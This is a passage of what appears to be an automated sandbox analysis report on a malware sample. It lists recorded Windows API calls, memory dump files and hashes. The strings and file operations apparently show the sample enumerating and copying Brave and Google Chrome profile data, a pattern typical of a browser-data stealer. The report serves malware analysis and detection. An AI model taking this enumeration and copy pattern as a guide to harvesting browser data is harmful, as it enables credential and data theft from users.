2920->2906 2954 9c8eb3-9c8eb5 2921->2954 2922->2921 2923->2906 2924->2906 2925->2926 2926->2954 2927->2954 2928->2927 2929->2930 2930->2954 2932->2906 2933->2906 2934->2906 2935->2906 2936->2906 2945->2903 2954->2906 2955 9c8eb7-9c8eb9 2954->2955 2955->2906 2956 9c8ebb-9c8ebd lstrcpy 2955->2956 2956->2906
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: f3a5b27d657fa94dcfaadce26fb6cde786379b94c72d8fb327b90d5888808ec2
                                • Instruction ID: d38d47accbc1c7ad12d612bb50898fbfc65f400380fe58b410d9f7bd635518d0
                                • Opcode Fuzzy Hash: f3a5b27d657fa94dcfaadce26fb6cde786379b94c72d8fb327b90d5888808ec2
                                • Instruction Fuzzy Hash: 73E026645083C6FBCB019BB6DCC8D577F6C9F44700F84846CF5444B602DE288C08C369

                                Non-executed Functions

                                Function 009C2390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C2402
                                • lstrlen.KERNEL32(\*.*), ref: 009C240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 009C2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009C2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 0d8f7dc26c767fd39e27900757083725ffeb415540c14e2fe85086b6d3795a3e
                                • Instruction ID: 4b55d974fb575d044f8d5849f50171496f6ba35711398f5ca42c8092606d54bf
                                • Opcode Fuzzy Hash: 0d8f7dc26c767fd39e27900757083725ffeb415540c14e2fe85086b6d3795a3e
                                • Instruction Fuzzy Hash: E8A27C31D116569BDB21EFB4DE88FAE77B9EF84710F044028B80AAB251DF34DD458B92
                                Function 009B16A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B16E2
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B176C
                                • lstrcat.KERNEL32(00000000), ref: 009B1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B17A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B17EF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B17F9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1825
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1875
                                • lstrcat.KERNEL32(00000000), ref: 009B187F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B18AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B18FE
                                • lstrlen.KERNEL32(009E1794), ref: 009B1909
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1929
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B1935
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B195B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1966
                                • lstrlen.KERNEL32(\*.*), ref: 009B1971
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B198E
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 009B199A
                                  • Part of subcall function 009D4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 009D406D
                                  • Part of subcall function 009D4040: lstrcpy.KERNEL32(00000000,?), ref: 009D40A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B19C3
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1A0E
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1A16
                                • lstrlen.KERNEL32(009E1794), ref: 009B1A21
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1A41
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B1A4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1A76
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1A81
                                • lstrlen.KERNEL32(009E1794), ref: 009B1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1AAC
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B1AB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1ADE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1AE9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1B11
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009B1B45
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009B1B70
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009B1B8A
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B1BC4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1BFB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1C03
                                • lstrlen.KERNEL32(009E1794), ref: 009B1C0E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1C31
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B1C3D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1C69
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1C74
                                • lstrlen.KERNEL32(009E1794), ref: 009B1C7F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1CA2
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B1CAE
                                • lstrlen.KERNEL32(?), ref: 009B1CBB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1CDB
                                • lstrcat.KERNEL32(00000000,?), ref: 009B1CE9
                                • lstrlen.KERNEL32(009E1794), ref: 009B1CF4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1D14
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B1D20
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1D46
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1D51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1D7D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1DE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1DEB
                                • lstrlen.KERNEL32(009E1794), ref: 009B1DF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1E19
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B1E25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1E4B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B1E56
                                • lstrlen.KERNEL32(009E1794), ref: 009B1E61
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1E81
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B1E8D
                                • lstrlen.KERNEL32(?), ref: 009B1E9A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1EBA
                                • lstrcat.KERNEL32(00000000,?), ref: 009B1EC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1EF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1F3E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 009B1F45
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B1F9F
                                • lstrlen.KERNEL32(010C88C8), ref: 009B1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 009B1FE3
                                • lstrlen.KERNEL32(009E1794), ref: 009B1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B200E
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B204D
                                • lstrlen.KERNEL32(009E1794), ref: 009B2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B2075
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B2081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                • String ID: \*.*
                                • API String ID: 4127656590-1173974218
                                • Opcode ID: df4a0809d72e2d6d1ffe9ef6da95a8f7902f0b2ea5ad5197ce470271708ccdc6
                                • Instruction ID: c196c8f530ca3066159fd286962b649824352116e5bc3cf5606537fca0ca7390
                                • Opcode Fuzzy Hash: df4a0809d72e2d6d1ffe9ef6da95a8f7902f0b2ea5ad5197ce470271708ccdc6
                                • Instruction Fuzzy Hash: 1D928C3191125A9BDB21EFA4DF88AEE77BDEF84720F544024F809AB251DB34DD05CBA1
                                Function 009BDB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BDBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDBEF
                                • lstrlen.KERNEL32(009E4CA8), ref: 009BDBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDC17
                                • lstrcat.KERNEL32(00000000,009E4CA8), ref: 009BDC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDC4C
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BDC8F
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BDCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009BDCD0
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009BDCF0
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009BDD0A
                                • lstrlen.KERNEL32(009DCFEC), ref: 009BDD1D
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BDD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDD7B
                                • lstrlen.KERNEL32(009E1794), ref: 009BDD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDDA3
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BDDAF
                                • lstrlen.KERNEL32(?), ref: 009BDDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 009BDDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDE19
                                • lstrlen.KERNEL32(009E1794), ref: 009BDE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BDE6F
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BDE7B
                                • lstrlen.KERNEL32(010C8B78), ref: 009BDE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDEBB
                                • lstrlen.KERNEL32(009E1794), ref: 009BDEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BDEE6
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BDEF2
                                • lstrlen.KERNEL32(010C8998), ref: 009BDF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDFA5
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BDFB1
                                • lstrlen.KERNEL32(010C8B78), ref: 009BDFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDFF4
                                • lstrlen.KERNEL32(009E1794), ref: 009BDFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE022
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BE02E
                                • lstrlen.KERNEL32(010C8998), ref: 009BE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 009BE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 009BE0E7
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BE11F
                                • lstrlen.KERNEL32(010CD280), ref: 009BE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE155
                                • lstrcat.KERNEL32(00000000,?), ref: 009BE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE19F
                                • lstrcat.KERNEL32(00000000), ref: 009BE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 009BE1F9
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BE22F
                                • lstrlen.KERNEL32(010C88C8), ref: 009BE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE261
                                • lstrcat.KERNEL32(00000000,010C88C8), ref: 009BE269
                                • lstrlen.KERNEL32(\Brave\Preferences), ref: 009BE274
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE29B
                                • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 009BE2A7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE2CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE30F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE349
                                • DeleteFileA.KERNEL32(?), ref: 009BE381
                                • StrCmpCA.SHLWAPI(?,010CD370), ref: 009BE3AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE3F4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE41C
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE445
                                • StrCmpCA.SHLWAPI(?,010C8998), ref: 009BE468
                                • StrCmpCA.SHLWAPI(?,010C8B78), ref: 009BE47D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE4D9
                                • GetFileAttributesA.KERNEL32(00000000), ref: 009BE4E0
                                • StrCmpCA.SHLWAPI(?,010CD358), ref: 009BE58E
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BE5C4
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 009BE639
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE678
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE6A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE6C7
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE70E
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE737
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE75C
                                • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 009BE776
                                • DeleteFileA.KERNEL32(?), ref: 009BE7D2
                                • StrCmpCA.SHLWAPI(?,010C89D8), ref: 009BE7FC
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE88C
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE8B5
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE8EE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE916
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE952
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 2635522530-726946144
                                • Opcode ID: cebae8d55144fbc2e0cfe7a0af066c61ac2889b8c012abbbe31b2d7f8cab043a
                                • Instruction ID: d31e5c26eea7a55fe8527aac688b32e93c2b73ad3375cc674d3ece2a6bb59100
                                • Opcode Fuzzy Hash: cebae8d55144fbc2e0cfe7a0af066c61ac2889b8c012abbbe31b2d7f8cab043a
                                • Instruction Fuzzy Hash: A7928E7191124A9BDB20EFA4DE89AEE77BDEF84320F144528F80AA7251DF34DC45CB91
                                Function 009C18A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C18D2
                                • lstrlen.KERNEL32(\*.*), ref: 009C18DD
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C18FF
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 009C190B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1932
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009C1947
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009C1967
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009C1981
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C19BF
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C19F2
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C1A1A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C1A25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1A4C
                                • lstrlen.KERNEL32(009E1794), ref: 009C1A5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1A80
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1AB4
                                • lstrlen.KERNEL32(?), ref: 009C1AC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1AE5
                                • lstrcat.KERNEL32(00000000,?), ref: 009C1AF3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1B19
                                • lstrlen.KERNEL32(010C8958), ref: 009C1B2F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1B59
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C1B64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1B8F
                                • lstrlen.KERNEL32(009E1794), ref: 009C1BA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1BC3
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1BCF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1BF8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1C25
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C1C30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1C57
                                • lstrlen.KERNEL32(009E1794), ref: 009C1C69
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1C8B
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1C97
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1CC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1CEF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C1CFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1D21
                                • lstrlen.KERNEL32(009E1794), ref: 009C1D33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1D55
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1D61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1D8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1DB9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C1DC4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1DED
                                • lstrlen.KERNEL32(009E1794), ref: 009C1E19
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1E36
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1E42
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1E68
                                • lstrlen.KERNEL32(010CD418), ref: 009C1E7E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1EB2
                                • lstrlen.KERNEL32(009E1794), ref: 009C1EC6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1EE3
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1EEF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1F15
                                • lstrlen.KERNEL32(010CDC30), ref: 009C1F2B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1F5F
                                • lstrlen.KERNEL32(009E1794), ref: 009C1F73
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1F90
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1F9C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1FC2
                                • lstrlen.KERNEL32(010BA5F0), ref: 009C1FD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C2000
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C200B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C2036
                                • lstrlen.KERNEL32(009E1794), ref: 009C2048
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C2067
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C2073
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C2098
                                • lstrlen.KERNEL32(?), ref: 009C20AC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C20D0
                                • lstrcat.KERNEL32(00000000,?), ref: 009C20DE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C2103
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C213F
                                • lstrlen.KERNEL32(010CD280), ref: 009C214E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C2176
